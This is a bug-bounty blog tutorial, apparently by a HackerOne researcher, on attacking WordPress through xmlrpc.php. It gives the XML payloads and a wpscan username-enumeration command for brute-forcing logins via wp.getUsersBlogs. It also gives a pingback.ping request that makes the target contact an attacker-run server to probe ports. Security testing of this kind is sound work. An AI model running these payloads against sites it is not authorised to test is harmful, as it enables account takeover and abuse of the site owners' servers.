How to hack WordPress website via xmlrpc.php?

Muhammad Asim Shahzad
Jun 11 · 5 min read

Hello guys,

This is Muhammad Asim Shahzad a.k.a protector47, As I said before on my facebook fan page now I will share all my findings PoCs.

Facebook Page: https://www.facebook.com/protector47.official/

Like and follow my facebook page to get the notification of each and every post/writeups because I also planned to start a bug bounty guide program for those who want to start bug bounty but don’t know how?

Do like, share and follow to spread the knowledge. that’s all! Now come back to the point. Today I will discuss how we can perform brute-force the WordPress credentials and Cross-Site Port attack via XML remote procedure call (xmlrpc.php)?

Nothing is secure :)

What is WordPress?

WordPress is the world’s most popular content management system for creating websites. WordPress is capable of creating any style of website, from a simple blog to a full-featured business website. You can even use WordPress to create an online store (using the popular WooCommerce plugin).

XML-RPC on WordPress is actually an API or “application program interface“. It gives developers who make mobile apps, desktop apps, and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface. These include:
1) Publish a post
2) Edit a post
3) Delete a post.
4) Upload a new file (e.g. an image for a post)
5) Get a list of comments
6) Edit comments

Some Vulnerabilities in XML-RPC:

There are several vulnerabilities we can test if xmlrpc.php is enabled on the WordPress website. I will share the proper steps to test the vulnerabilities of xmlrpc.php

ATTACK# 1:

  1. If you are testing a WordPress website then first of all check whether xmlrpc.php in enabled or not?

NOTE: I can’t share the website because it is a private program on HackerOne.

https://website.com/xmlrpc.php

XML-RPC is enabled

2. Intercept the request the via BURP Proxy and send it to the repeater.

3. Its says “Method Not Allowed” because xmlprc.php use POST method rather than the GET method, We have to change the method of the request.

Change the method by simply selecting the option “Change request method”
Method has been changed to POST.

4. The method has been changed to post, We have to Send a POST request and list all the available methods, why? cause that’s how we’ll know which actions are even possible to make and potentially use one of them for an attack.
To list all methods Send a POST request with the following POST data like shown in the picture, you’ll get a response with all the methods available

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

All methods are available.

Search for the following methods, if they are available then we can proceed to with some attacks:

  1. wp.getUserBlogs
  2. wp.getCategories
  3. metaWeblog.getUsersBlogs
  4. pingback.ping

5. To perform the brute-force login send the following in the POST request if you know any valid usernames that would be even better
I would recommend wp-scan to find a list of valid usernames, almost all the time companies never try to prevent username enumeration on WordPress sites:

We can enumerate the usernames of a WordPress website by simply using the built-in tool of Kali Linux WPSCAN.

Run this command on terminal:

wpscan — url https://webiste.com — enumerate u

6. Once usernames are enumerated now we are able to brute force the password via xmlrpc.php

7. Send the POST request containing this POST data, In which value “admin” is the username and value “pass” is the password

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

8. You can just load this into intruder and brute-force away.
Whether you enter the wrong Pass or the correct you will get a 200 OK response, so your suppose to decide which is correct and which is wrong on the basis of the size of the response if you're using intruder.

ATTACK# 2:

  1. List all the methods and search for the following
    pingback.ping’

2. If you manage to find the “pingback.ping” string, then let's proceed and try and get a pingback on our server, you can use netcat, or python server, nodejs server, or even the apache logs anything you want. I’ll be using the python server. Start your server and send the following request in post data

How to start your python server?

python server started.

Check your IP to get a pingback to your python server.

In my case, my IP is 192.168.0.106 (Make sure your VM should be on the bridge mode)

3. Time to craft a request via BURP to get the pingback to our server. We have to craft a request containing this POST data:

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>
http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>
http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

Above POST data contains <YOUR SERVER >:<port>” means the python server that we have already started and the second things is <SOME VALID BLOG FROM THE SITE >means any valid blog link of the target website.

Like this:

Int tag contains the value “Zero”

4. In the response if you get faultCode and a value greater then 0 (<value><int>17</int></value> )then it means the port is open+ you can verify this by checking your server logs.

I have reported this vulnerability to a HackerOne private program and my report got triaged.

Thanks for reading my blog!

NOTE: Share this blog as much as can to spread the knowledge and follow my facebook fan page to get the updates.

Happy Hacking :)

Muhammad Asim Shahzad

Written by

Synack Red Team Member | Bug Bounty Hunter at HackerOne | Pentest Engineer at Trillium Information Security Systems.